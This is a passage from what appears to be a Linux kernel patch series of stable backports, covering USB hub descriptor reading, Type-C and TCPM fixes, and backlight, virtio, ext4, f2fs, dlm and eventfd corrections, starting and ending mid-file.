++		maxp0 = get_bMaxPacketSize0(udev, buf, 8, retries == 0);
++		if (maxp0 < 0) {
++			retval = maxp0;
+ 			if (retval != -ENODEV)
+ 				dev_err(&udev->dev,
+ 					"device descriptor read/8, error %d\n",
+ 					retval);
+-			if (retval >= 0)
+-				retval = -EMSGSIZE;
+ 		} else {
+ 			u32 delay;
+ 
+-			retval = 0;
++			if (!initial && maxp0 != udev->descriptor.bMaxPacketSize0) {
++				dev_err(&udev->dev, "device reset changed ep0 maxpacket size!\n");
++				retval = -ENODEV;
++				goto fail;
++			}
+ 
+ 			delay = udev->parent->hub_delay;
+ 			udev->hub_delay = min_t(u32, delay,
+@@ -4949,48 +4995,61 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 		goto fail;
+ 
+ 	/*
+-	 * Some superspeed devices have finished the link training process
+-	 * and attached to a superspeed hub port, but the device descriptor
+-	 * got from those devices show they aren't superspeed devices. Warm
+-	 * reset the port attached by the devices can fix them.
++	 * Check the ep0 maxpacket guess and correct it if necessary.
++	 * maxp0 is the value stored in the device descriptor;
++	 * i is the value it encodes (logarithmic for SuperSpeed or greater).
+ 	 */
+-	if ((udev->speed >= USB_SPEED_SUPER) &&
+-			(le16_to_cpu(udev->descriptor.bcdUSB) < 0x0300)) {
+-		dev_err(&udev->dev, "got a wrong device descriptor, "
+-				"warm reset device\n");
+-		hub_port_reset(hub, port1, udev,
+-				HUB_BH_RESET_TIME, true);
+-		retval = -EINVAL;
+-		goto fail;
+-	}
+-
+-	if (udev->descriptor.bMaxPacketSize0 == 0xff ||
+-			udev->speed >= USB_SPEED_SUPER)
+-		i = 512;
+-	else
+-		i = udev->descriptor.bMaxPacketSize0;
+-	if (usb_endpoint_maxp(&udev->ep0.desc) != i) {
+-		if (udev->speed == USB_SPEED_LOW ||
+-				!(i == 8 || i == 16 || i == 32 || i == 64)) {
+-			dev_err(&udev->dev, "Invalid ep0 maxpacket: %d\n", i);
+-			retval = -EMSGSIZE;
+-			goto fail;
+-		}
++	i = maxp0;
++	if (udev->speed >= USB_SPEED_SUPER) {
++		if (maxp0 <= 16)
++			i = 1 << maxp0;
++		else
++			i = 0;		/* Invalid */
++	}
++	if (usb_endpoint_maxp(&udev->ep0.desc) == i) {
++		;	/* Initial ep0 maxpacket guess is right */
++	} else if ((udev->speed == USB_SPEED_FULL ||
++				udev->speed == USB_SPEED_HIGH) &&
++			(i == 8 || i == 16 || i == 32 || i == 64)) {
++		/* Initial guess is wrong; use the descriptor's value */
+ 		if (udev->speed == USB_SPEED_FULL)
+ 			dev_dbg(&udev->dev, "ep0 maxpacket = %d\n", i);
+ 		else
+ 			dev_warn(&udev->dev, "Using ep0 maxpacket: %d\n", i);
+ 		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(i);
+ 		usb_ep0_reinit(udev);
++	} else {
++		/* Initial guess is wrong and descriptor's value is invalid */
++		dev_err(&udev->dev, "Invalid ep0 maxpacket: %d\n", maxp0);
++		retval = -EMSGSIZE;
++		goto fail;
+ 	}
+ 
+-	retval = usb_get_device_descriptor(udev, USB_DT_DEVICE_SIZE);
+-	if (retval < (signed)sizeof(udev->descriptor)) {
++	descr = usb_get_device_descriptor(udev);
++	if (IS_ERR(descr)) {
++		retval = PTR_ERR(descr);
+ 		if (retval != -ENODEV)
+ 			dev_err(&udev->dev, "device descriptor read/all, error %d\n",
+ 					retval);
+-		if (retval >= 0)
+-			retval = -ENOMSG;
++		goto fail;
++	}
++	if (initial)
++		udev->descriptor = *descr;
++	else
++		*dev_descr = *descr;
++	kfree(descr);
++
++	/*
++	 * Some superspeed devices have finished the link training process
++	 * and attached to a superspeed hub port, but the device descriptor
++	 * got from those devices show they aren't superspeed devices. Warm
++	 * reset the port attached by the devices can fix them.
++	 */
++	if ((udev->speed >= USB_SPEED_SUPER) &&
++			(le16_to_cpu(udev->descriptor.bcdUSB) < 0x0300)) {
++		dev_err(&udev->dev, "got a wrong device descriptor, warm reset device\n");
++		hub_port_reset(hub, port1, udev, HUB_BH_RESET_TIME, true);
++		retval = -EINVAL;
+ 		goto fail;
+ 	}
+ 
+@@ -5016,6 +5075,7 @@ fail:
+ 		hub_port_disable(hub, port1, 0);
+ 		update_devnum(udev, devnum);	/* for disconnect processing */
+ 	}
++	kfree(buf);
+ 	return retval;
+ }
+ 
+@@ -5096,7 +5156,7 @@ hub_power_remaining(struct usb_hub *hub)
+ 
+ 
+ static int descriptors_changed(struct usb_device *udev,
+-		struct usb_device_descriptor *old_device_descriptor,
++		struct usb_device_descriptor *new_device_descriptor,
+ 		struct usb_host_bos *old_bos)
+ {
+ 	int		changed = 0;
+@@ -5107,8 +5167,8 @@ static int descriptors_changed(struct usb_device *udev,
+ 	int		length;
+ 	char		*buf;
+ 
+-	if (memcmp(&udev->descriptor, old_device_descriptor,
+-			sizeof(*old_device_descriptor)) != 0)
++	if (memcmp(&udev->descriptor, new_device_descriptor,
++			sizeof(*new_device_descriptor)) != 0)
+ 		return 1;
+ 
+ 	if ((old_bos && !udev->bos) || (!old_bos && udev->bos))
+@@ -5281,7 +5341,7 @@ static void hub_port_connect(struct usb_hub *hub, int port1, u16 portstatus,
+ 		}
+ 
+ 		/* reset (non-USB 3.0 devices) and get descriptor */
+-		status = hub_port_init(hub, udev, port1, i);
++		status = hub_port_init(hub, udev, port1, i, NULL);
+ 		if (status < 0)
+ 			goto loop;
+ 
+@@ -5428,9 +5488,8 @@ static void hub_port_connect_change(struct usb_hub *hub, int port1,
+ {
+ 	struct usb_port *port_dev = hub->ports[port1 - 1];
+ 	struct usb_device *udev = port_dev->child;
+-	struct usb_device_descriptor descriptor;
++	struct usb_device_descriptor *descr;
+ 	int status = -ENODEV;
+-	int retval;
+ 
+ 	dev_dbg(&port_dev->dev, "status %04x, change %04x, %s\n", portstatus,
+ 			portchange, portspeed(hub, portstatus));
+@@ -5457,23 +5516,20 @@ static void hub_port_connect_change(struct usb_hub *hub, int port1,
+ 			 * changed device descriptors before resuscitating the
+ 			 * device.
+ 			 */
+-			descriptor = udev->descriptor;
+-			retval = usb_get_device_descriptor(udev,
+-					sizeof(udev->descriptor));
+-			if (retval < 0) {
++			descr = usb_get_device_descriptor(udev);
++			if (IS_ERR(descr)) {
+ 				dev_dbg(&udev->dev,
+-						"can't read device descriptor %d\n",
+-						retval);
++						"can't read device descriptor %ld\n",
++						PTR_ERR(descr));
+ 			} else {
+-				if (descriptors_changed(udev, &descriptor,
++				if (descriptors_changed(udev, descr,
+ 						udev->bos)) {
+ 					dev_dbg(&udev->dev,
+ 							"device descriptor has changed\n");
+-					/* for disconnect() calls */
+-					udev->descriptor = descriptor;
+ 				} else {
+ 					status = 0; /* Nothing to do */
+ 				}
++				kfree(descr);
+ 			}
+ #ifdef CONFIG_PM
+ 		} else if (udev->state == USB_STATE_SUSPENDED &&
+@@ -5911,7 +5967,7 @@ static int usb_reset_and_verify_device(struct usb_device *udev)
+ 	struct usb_device		*parent_hdev = udev->parent;
+ 	struct usb_hub			*parent_hub;
+ 	struct usb_hcd			*hcd = bus_to_hcd(udev->bus);
+-	struct usb_device_descriptor	descriptor = udev->descriptor;
++	struct usb_device_descriptor	descriptor;
+ 	struct usb_host_bos		*bos;
+ 	int				i, j, ret = 0;
+ 	int				port1 = udev->portnum;
+@@ -5943,7 +5999,7 @@ static int usb_reset_and_verify_device(struct usb_device *udev)
+ 		/* ep0 maxpacket size may change; let the HCD know about it.
+ 		 * Other endpoints will be handled by re-enumeration. */
+ 		usb_ep0_reinit(udev);
+-		ret = hub_port_init(parent_hub, udev, port1, i);
++		ret = hub_port_init(parent_hub, udev, port1, i, &descriptor);
+ 		if (ret >= 0 || ret == -ENOTCONN || ret == -ENODEV)
+ 			break;
+ 	}
+@@ -5955,7 +6011,6 @@ static int usb_reset_and_verify_device(struct usb_device *udev)
+ 	/* Device might have changed firmware (DFU or similar) */
+ 	if (descriptors_changed(udev, &descriptor, bos)) {
+ 		dev_info(&udev->dev, "device firmware changed\n");
+-		udev->descriptor = descriptor;	/* for disconnect() calls */
+ 		goto re_enumerate;
+ 	}
+ 
+diff --git a/drivers/usb/core/message.c b/drivers/usb/core/message.c
+index 4d59d927ae3e3..1673e5d089263 100644
+--- a/drivers/usb/core/message.c
++++ b/drivers/usb/core/message.c
+@@ -1039,40 +1039,35 @@ char *usb_cache_string(struct usb_device *udev, int index)
+ }
+ 
+ /*
+- * usb_get_device_descriptor - (re)reads the device descriptor (usbcore)
+- * @dev: the device whose device descriptor is being updated
+- * @size: how much of the descriptor to read
++ * usb_get_device_descriptor - read the device descriptor
++ * @udev: the device whose device descriptor should be read
+  *
+  * Context: task context, might sleep.
+  *
+- * Updates the copy of the device descriptor stored in the device structure,
+- * which dedicates space for this purpose.
+- *
+  * Not exported, only for use by the core.  If drivers really want to read
+  * the device descriptor directly, they can call usb_get_descriptor() with
+  * type = USB_DT_DEVICE and index = 0.
+  *
+- * This call is synchronous, and may not be used in an interrupt context.
+- *
+- * Return: The number of bytes received on success, or else the status code
+- * returned by the underlying usb_control_msg() call.
++ * Returns: a pointer to a dynamically allocated usb_device_descriptor
++ * structure (which the caller must deallocate), or an ERR_PTR value.
+  */
+-int usb_get_device_descriptor(struct usb_device *dev, unsigned int size)
++struct usb_device_descriptor *usb_get_device_descriptor(struct usb_device *udev)
+ {
+ 	struct usb_device_descriptor *desc;
+ 	int ret;
+ 
+-	if (size > sizeof(*desc))
+-		return -EINVAL;
+ 	desc = kmalloc(sizeof(*desc), GFP_NOIO);
+ 	if (!desc)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
++
++	ret = usb_get_descriptor(udev, USB_DT_DEVICE, 0, desc, sizeof(*desc));
++	if (ret == sizeof(*desc))
++		return desc;
+ 
+-	ret = usb_get_descriptor(dev, USB_DT_DEVICE, 0, desc, size);
+ 	if (ret >= 0)
+-		memcpy(&dev->descriptor, desc, size);
++		ret = -EMSGSIZE;
+ 	kfree(desc);
+-	return ret;
++	return ERR_PTR(ret);
+ }
+ 
+ /*
+diff --git a/drivers/usb/core/usb.h b/drivers/usb/core/usb.h
+index 82538daac8b89..3bb2e1db42b5d 100644
+--- a/drivers/usb/core/usb.h
++++ b/drivers/usb/core/usb.h
+@@ -42,8 +42,8 @@ extern bool usb_endpoint_is_ignored(struct usb_device *udev,
+ 		struct usb_endpoint_descriptor *epd);
+ extern int usb_remove_device(struct usb_device *udev);
+ 
+-extern int usb_get_device_descriptor(struct usb_device *dev,
+-		unsigned int size);
++extern struct usb_device_descriptor *usb_get_device_descriptor(
++		struct usb_device *udev);
+ extern int usb_set_isoch_delay(struct usb_device *dev);
+ extern int usb_get_bos_descriptor(struct usb_device *dev);
+ extern void usb_release_bos_descriptor(struct usb_device *dev);
+diff --git a/drivers/usb/gadget/function/f_mass_storage.c b/drivers/usb/gadget/function/f_mass_storage.c
+index 3abf7f586e2af..7b9a4cf9b100c 100644
+--- a/drivers/usb/gadget/function/f_mass_storage.c
++++ b/drivers/usb/gadget/function/f_mass_storage.c
+@@ -926,7 +926,7 @@ static void invalidate_sub(struct fsg_lun *curlun)
+ {
+ 	struct file	*filp = curlun->filp;
+ 	struct inode	*inode = file_inode(filp);
+-	unsigned long	rc;
++	unsigned long __maybe_unused	rc;
+ 
+ 	rc = invalidate_mapping_pages(inode->i_mapping, 0, -1);
+ 	VLDBG(curlun, "invalidate_mapping_pages -> %ld\n", rc);
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 316e9cc3987be..1c0c61e8ba696 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -40,6 +40,7 @@ static struct bus_type gadget_bus_type;
+  * @allow_connect: Indicates whether UDC is allowed to be pulled up.
+  * Set/cleared by gadget_(un)bind_driver() after gadget driver is bound or
+  * unbound.
++ * @vbus_work: work routine to handle VBUS status change notifications.
+  * @connect_lock: protects udc->started, gadget->connect,
+  * gadget->allow_connect and gadget->deactivate. The routines
+  * usb_gadget_connect_locked(), usb_gadget_disconnect_locked(),
+diff --git a/drivers/usb/phy/phy-mxs-usb.c b/drivers/usb/phy/phy-mxs-usb.c
+index d2836ef5d15c7..9299df53eb9df 100644
+--- a/drivers/usb/phy/phy-mxs-usb.c
++++ b/drivers/usb/phy/phy-mxs-usb.c
+@@ -388,14 +388,8 @@ static void __mxs_phy_disconnect_line(struct mxs_phy *mxs_phy, bool disconnect)
+ 
+ static bool mxs_phy_is_otg_host(struct mxs_phy *mxs_phy)
+ {
+-	void __iomem *base = mxs_phy->phy.io_priv;
+-	u32 phyctrl = readl(base + HW_USBPHY_CTRL);
+-
+-	if (IS_ENABLED(CONFIG_USB_OTG) &&
+-			!(phyctrl & BM_USBPHY_CTRL_OTG_ID_VALUE))
+-		return true;
+-
+-	return false;
++	return IS_ENABLED(CONFIG_USB_OTG) &&
++		mxs_phy->phy.last_event == USB_EVENT_ID;
+ }
+ 
+ static void mxs_phy_disconnect_line(struct mxs_phy *mxs_phy, bool on)
+diff --git a/drivers/usb/typec/bus.c b/drivers/usb/typec/bus.c
+index 31c2a3130cadb..69442a8135856 100644
+--- a/drivers/usb/typec/bus.c
++++ b/drivers/usb/typec/bus.c
+@@ -154,12 +154,20 @@ EXPORT_SYMBOL_GPL(typec_altmode_exit);
+  *
+  * Notifies the partner of @adev about Attention command.
+  */
+-void typec_altmode_attention(struct typec_altmode *adev, u32 vdo)
++int typec_altmode_attention(struct typec_altmode *adev, u32 vdo)
+ {
+-	struct typec_altmode *pdev = &to_altmode(adev)->partner->adev;
++	struct altmode *partner = to_altmode(adev)->partner;
++	struct typec_altmode *pdev;
++
++	if (!partner)
++		return -ENODEV;
++
++	pdev = &partner->adev;
+ 
+ 	if (pdev->ops && pdev->ops->attention)
+ 		pdev->ops->attention(pdev, vdo);
++
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(typec_altmode_attention);
+ 
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 5f45b82dd1914..ad4d0314d27fa 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1871,7 +1871,8 @@ static void tcpm_handle_vdm_request(struct tcpm_port *port,
+ 			}
+ 			break;
+ 		case ADEV_ATTENTION:
+-			typec_altmode_attention(adev, p[1]);
++			if (typec_altmode_attention(adev, p[1]))
++				tcpm_log(port, "typec_altmode_attention no port partner altmode");
+ 			break;
+ 		}
+ 	}
+@@ -3929,6 +3930,29 @@ static enum typec_cc_status tcpm_pwr_opmode_to_rp(enum typec_pwr_opmode opmode)
+ 	}
+ }
+ 
++static void tcpm_set_initial_svdm_version(struct tcpm_port *port)
++{
++	switch (port->negotiated_rev) {
++	case PD_REV30:
++		break;
++	/*
++	 * 6.4.4.2.3 Structured VDM Version
++	 * 2.0 states "At this time, there is only one version (1.0) defined.
++	 * This field Shall be set to zero to indicate Version 1.0."
++	 * 3.0 states "This field Shall be set to 01b to indicate Version 2.0."
++	 * To ensure that we follow the Power Delivery revision we are currently
++	 * operating on, downgrade the SVDM version to the highest one supported
++	 * by the Power Delivery revision.
++	 */
++	case PD_REV20:
++		typec_partner_set_svdm_version(port->partner, SVDM_VER_1_0);
++		break;
++	default:
++		typec_partner_set_svdm_version(port->partner, SVDM_VER_1_0);
++		break;
++	}
++}
++
+ static void run_state_machine(struct tcpm_port *port)
+ {
+ 	int ret;
+@@ -4153,10 +4177,12 @@ static void run_state_machine(struct tcpm_port *port)
+ 		 * For now, this driver only supports SOP for DISCOVER_IDENTITY, thus using
+ 		 * port->explicit_contract to decide whether to send the command.
+ 		 */
+-		if (port->explicit_contract)
++		if (port->explicit_contract) {
++			tcpm_set_initial_svdm_version(port);
+ 			mod_send_discover_delayed_work(port, 0);
+-		else
++		} else {
+ 			port->send_discover = false;
++		}
+ 
+ 		/*
+ 		 * 6.3.5
+@@ -4439,10 +4465,12 @@ static void run_state_machine(struct tcpm_port *port)
+ 		 * For now, this driver only supports SOP for DISCOVER_IDENTITY, thus using
+ 		 * port->explicit_contract.
+ 		 */
+-		if (port->explicit_contract)
++		if (port->explicit_contract) {
++			tcpm_set_initial_svdm_version(port);
+ 			mod_send_discover_delayed_work(port, 0);
+-		else
++		} else {
+ 			port->send_discover = false;
++		}
+ 
+ 		power_supply_changed(port->psy);
+ 		break;
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 009ba186652ac..18a2dbbc77799 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -2822,7 +2822,7 @@ static int vfio_iommu_iova_build_caps(struct vfio_iommu *iommu,
+ static int vfio_iommu_migration_build_caps(struct vfio_iommu *iommu,
+ 					   struct vfio_info_cap *caps)
+ {
+-	struct vfio_iommu_type1_info_cap_migration cap_mig;
++	struct vfio_iommu_type1_info_cap_migration cap_mig = {};
+ 
+ 	cap_mig.header.id = VFIO_IOMMU_TYPE1_INFO_CAP_MIGRATION;
+ 	cap_mig.header.version = 1;
+diff --git a/drivers/video/backlight/bd6107.c b/drivers/video/backlight/bd6107.c
+index a506872d43963..94fe628dd88c0 100644
+--- a/drivers/video/backlight/bd6107.c
++++ b/drivers/video/backlight/bd6107.c
+@@ -104,7 +104,7 @@ static int bd6107_backlight_check_fb(struct backlight_device *backlight,
+ {
+ 	struct bd6107 *bd = bl_get_data(backlight);
+ 
+-	return bd->pdata->fbdev == NULL || bd->pdata->fbdev == info->dev;
++	return bd->pdata->fbdev == NULL || bd->pdata->fbdev == info->device;
+ }
+ 
+ static const struct backlight_ops bd6107_backlight_ops = {
+diff --git a/drivers/video/backlight/gpio_backlight.c b/drivers/video/backlight/gpio_backlight.c
+index 6f78d928f054a..5c5c99f7979e3 100644
+--- a/drivers/video/backlight/gpio_backlight.c
++++ b/drivers/video/backlight/gpio_backlight.c
+@@ -35,7 +35,7 @@ static int gpio_backlight_check_fb(struct backlight_device *bl,
+ {
+ 	struct gpio_backlight *gbl = bl_get_data(bl);
+ 
+-	return gbl->fbdev == NULL || gbl->fbdev == info->dev;
++	return gbl->fbdev == NULL || gbl->fbdev == info->device;
+ }
+ 
+ static const struct backlight_ops gpio_backlight_ops = {
+diff --git a/drivers/video/backlight/lv5207lp.c b/drivers/video/backlight/lv5207lp.c
+index 767b800d79faf..8a027a5ea552b 100644
+--- a/drivers/video/backlight/lv5207lp.c
++++ b/drivers/video/backlight/lv5207lp.c
+@@ -67,7 +67,7 @@ static int lv5207lp_backlight_check_fb(struct backlight_device *backlight,
+ {
+ 	struct lv5207lp *lv = bl_get_data(backlight);
+ 
+-	return lv->pdata->fbdev == NULL || lv->pdata->fbdev == info->dev;
++	return lv->pdata->fbdev == NULL || lv->pdata->fbdev == info->device;
+ }
+ 
+ static const struct backlight_ops lv5207lp_backlight_ops = {
+diff --git a/drivers/virtio/virtio_ring.c b/drivers/virtio/virtio_ring.c
+index 90d514c141794..7d320f799ca1e 100644
+--- a/drivers/virtio/virtio_ring.c
++++ b/drivers/virtio/virtio_ring.c
+@@ -1449,7 +1449,7 @@ static inline int virtqueue_add_packed(struct virtqueue *_vq,
+ 		}
+ 	}
+ 
+-	if (i < head)
++	if (i <= head)
+ 		vq->packed.avail_wrap_counter ^= 1;
+ 
+ 	/* We're using some buffers from the free list. */
+diff --git a/fs/dlm/plock.c b/fs/dlm/plock.c
+index 739e7d55c9e3d..1bf5c51a4c23b 100644
+--- a/fs/dlm/plock.c
++++ b/fs/dlm/plock.c
+@@ -455,7 +455,8 @@ static ssize_t dev_write(struct file *file, const char __user *u, size_t count,
+ 		}
+ 	} else {
+ 		list_for_each_entry(iter, &recv_list, list) {
+-			if (!iter->info.wait) {
++			if (!iter->info.wait &&
++			    iter->info.fsid == info.fsid) {
+ 				op = iter;
+ 				break;
+ 			}
+@@ -467,8 +468,7 @@ static ssize_t dev_write(struct file *file, const char __user *u, size_t count,
+ 		if (info.wait)
+ 			WARN_ON(op->info.optype != DLM_PLOCK_OP_LOCK);
+ 		else
+-			WARN_ON(op->info.fsid != info.fsid ||
+-				op->info.number != info.number ||
++			WARN_ON(op->info.number != info.number ||
+ 				op->info.owner != info.owner ||
+ 				op->info.optype != info.optype);
+ 
+diff --git a/fs/eventfd.c b/fs/eventfd.c
+index 249ca6c0b7843..4a60ea932e3d9 100644
+--- a/fs/eventfd.c
++++ b/fs/eventfd.c
+@@ -189,7 +189,7 @@ void eventfd_ctx_do_read(struct eventfd_ctx *ctx, __u64 *cnt)
+ {
+ 	lockdep_assert_held(&ctx->wqh.lock);
+ 
+-	*cnt = (ctx->flags & EFD_SEMAPHORE) ? 1 : ctx->count;
++	*cnt = ((ctx->flags & EFD_SEMAPHORE) && ctx->count) ? 1 : ctx->count;
+ 	ctx->count -= *cnt;
+ }
+ EXPORT_SYMBOL_GPL(eventfd_ctx_do_read);
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 88ed64ebae3e7..016925b1a0908 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -966,8 +966,9 @@ static inline int should_optimize_scan(struct ext4_allocation_context *ac)
+  * Return next linear group for allocation. If linear traversal should not be
+  * performed, this function just returns the same group
+  */
+-static int
+-next_linear_group(struct ext4_allocation_context *ac, int group, int ngroups)
++static ext4_group_t
++next_linear_group(struct ext4_allocation_context *ac, ext4_group_t group,
++		  ext4_group_t ngroups)
+ {
+ 	if (!should_optimize_scan(ac))
+ 		goto inc_and_return;
+@@ -2401,7 +2402,7 @@ static bool ext4_mb_good_group(struct ext4_allocation_context *ac,
+ 
+ 	BUG_ON(cr < 0 || cr >= 4);
+ 
+-	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(grp) || !grp))
++	if (unlikely(!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp)))
+ 		return false;
+ 
+ 	free = grp->bb_free;
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 0e1aeb9cb4a7c..6a08fc31a66de 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -2799,6 +2799,7 @@ static int ext4_add_nondir(handle_t *handle,
+ 		return err;
+ 	}
+ 	drop_nlink(inode);
++	ext4_mark_inode_dirty(handle, inode);
+ 	ext4_orphan_add(handle, inode);
+ 	unlock_new_inode(inode);
+ 	return err;
+@@ -3436,6 +3437,7 @@ retry:
+ 
+ err_drop_inode:
+ 	clear_nlink(inode);
++	ext4_mark_inode_dirty(handle, inode);
+ 	ext4_orphan_add(handle, inode);
+ 	unlock_new_inode(inode);
+ 	if (handle)
+@@ -4021,6 +4023,7 @@ end_rename:
+ 			ext4_resetent(handle, &old,
+ 				      old.inode->i_ino, old_file_type);
+ 			drop_nlink(whiteout);
++			ext4_mark_inode_dirty(handle, whiteout);
+ 			ext4_orphan_add(handle, whiteout);
+ 		}
+ 		unlock_new_inode(whiteout);
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 4d1e48c676fab..c2b7d09238941 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -4453,7 +4453,8 @@ static inline bool f2fs_low_mem_mode(struct f2fs_sb_info *sbi)
+ static inline bool f2fs_may_compress(struct inode *inode)
+ {
+ 	if (IS_SWAPFILE(inode) || f2fs_is_pinned_file(inode) ||
+-		f2fs_is_atomic_file(inode) || f2fs_has_inline_data(inode))
++		f2fs_is_atomic_file(inode) || f2fs_has_inline_data(inode) ||
++		f2fs_is_mmap_file(inode))
+ 		return false;
+ 	return S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode);
+ }
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 7b94f047cbf79..746c71716bead 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -530,7 +530,11 @@ static int f2fs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 
+ 	file_accessed(file);
+ 	vma->vm_ops = &f2fs_file_vm_ops;
++
++	f2fs_down_read(&F2FS_I(inode)->i_sem);
+ 	set_inode_flag(inode, FI_MMAP_FILE);
++	f2fs_up_read(&F2FS_I(inode)->i_sem);
++
+ 	return 0;
+ }
+ 
+@@ -1927,12 +1931,19 @@ static int f2fs_setflags_common(struct inode *inode, u32 iflags, u32 mask)
+ 			int err = f2fs_convert_inline_inode(inode);
+ 			if (err)
+ 				return err;
+-			if (!f2fs_may_compress(inode))
+-				return -EINVAL;
+-			if (S_ISREG(inode->i_mode) && F2FS_HAS_BLOCKS(inode))
++
++			f2fs_down_write(&F2FS_I(inode)->i_sem);
++			if (!f2fs_may_compress(inode) ||
++					(S_ISREG(inode->i_mode) &&
++					F2FS_HAS_BLOCKS(inode))) {
++				f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 				return -EINVAL;
+-			if (set_compress_context(inode))
+-				return -EOPNOTSUPP;
++			}
++			err = set_compress_context(inode);
++			f2fs_up_write(&F2FS_I(inode)->i_sem);
++
++			if (err)
++				return err;
+ 		}
+ 	}
+ 
+@@ -3958,6 +3969,7 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 	file_start_write(filp);
+ 	inode_lock(inode);
+ 
++	f2fs_down_write(&F2FS_I(inode)->i_sem);
+ 	if (f2fs_is_mmap_file(inode) || get_dirty_pages(inode)) {
+ 		ret = -EBUSY;
+ 		goto out;
+@@ -3977,6 +3989,7 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 		f2fs_warn(sbi, "compression algorithm is successfully set, "
+ 			"but current kernel doesn't support this algorithm.");
+ out:
++	f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 	inode_unlock(inode);
+ 	file_end_write(filp);
+ 
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index aab3b8b3ab0a7..1fc7760499f10 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -397,6 +397,12 @@ static int do_read_inode(struct inode *inode)
+ 		fi->i_inline_xattr_size = 0;
+ 	}
+ 
++	if (!sanity_check_inode(inode, node_page)) {
++		f2fs_put_page(node_page, 1);
++		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
++		return -EFSCORRUPTED;
++	}
++
+ 	/* check data exist */
+ 	if (f2fs_has_inline_data(inode) && !f2fs_exist_data(inode))
+ 		__recover_inline_status(inode, node_page);
+@@ -459,12 +465,6 @@ static int do_read_inode(struct inode *inode)
+ 	/* Need all the flag bits */
+ 	f2fs_init_read_extent_tree(inode, node_page);
+ 
+-	if (!sanity_check_inode(inode, node_page)) {
+-		f2fs_put_page(node_page, 1);
+-		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	if (!sanity_check_extent_cache(inode)) {
+ 		f2fs_put_page(node_page, 1);
+ 		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index b6dad389fa144..2046f633fe57a 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -858,11 +858,6 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 			if (!name)
+ 				return -ENOMEM;
+ 			if (!strcmp(name, "adaptive")) {
+-				if (f2fs_sb_has_blkzoned(sbi)) {
+-					f2fs_warn(sbi, "adaptive mode is not allowed with zoned block device feature");
+-					kfree(name);
+-					return -EINVAL;
+-				}
+ 				F2FS_OPTION(sbi).fs_mode = FS_MODE_ADAPTIVE;
+ 			} else if (!strcmp(name, "lfs")) {
+ 				F2FS_OPTION(sbi).fs_mode = FS_MODE_LFS;
+@@ -1285,19 +1280,23 @@ default_check:
+ 	 * zone alignment optimization. This is optional for host-aware
+ 	 * devices, but mandatory for host-managed zoned block devices.
+ 	 */
+-#ifndef CONFIG_BLK_DEV_ZONED
+-	if (f2fs_sb_has_blkzoned(sbi)) {
+-		f2fs_err(sbi, "Zoned block device support is not enabled");
+-		return -EINVAL;
+-	}
+-#endif
+ 	if (f2fs_sb_has_blkzoned(sbi)) {
++#ifdef CONFIG_BLK_DEV_ZONED
+ 		if (F2FS_OPTION(sbi).discard_unit !=
+ 						DISCARD_UNIT_SECTION) {
+ 			f2fs_info(sbi, "Zoned block device doesn't need small discard, set discard_unit=section by default");
+ 			F2FS_OPTION(sbi).discard_unit =
+ 					DISCARD_UNIT_SECTION;
+ 		}
++
++		if (F2FS_OPTION(sbi).fs_mode != FS_MODE_LFS) {
++			f2fs_info(sbi, "Only lfs mode is allowed with zoned block device feature");
++			return -EINVAL;
++		}
++#else
++		f2fs_err(sbi, "Zoned block device support is not enabled");
++		return -EINVAL;
++#endif
+ 	}
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+diff --git a/fs/fs_context.c b/fs/fs_context.c
+index 851214d1d013d..375023e40161d 100644
+--- a/fs/fs_context.c
++++ b/fs/fs_context.c
+@@ -315,10 +315,31 @@ struct fs_context *fs_context_for_reconfigure(struct dentry *dentry,
+ }
+ EXPORT_SYMBOL(fs_context_for_reconfigure);
+ 
++/**
++ * fs_context_for_submount: allocate a new fs_context for a submount
++ * @type: file_system_type of the new context
++ * @reference: reference dentry from which to copy relevant info
++ *
++ * Allocate a new fs_context suitable for a submount. This also ensures that
++ * the fc->security object is inherited from @reference (if needed).
++ */
+ struct fs_context *fs_context_for_submount(struct file_system_type *type,
+ 					   struct dentry *reference)
+ {
+-	return alloc_fs_context(type, reference, 0, 0, FS_CONTEXT_FOR_SUBMOUNT);
++	struct fs_context *fc;
++	int ret;
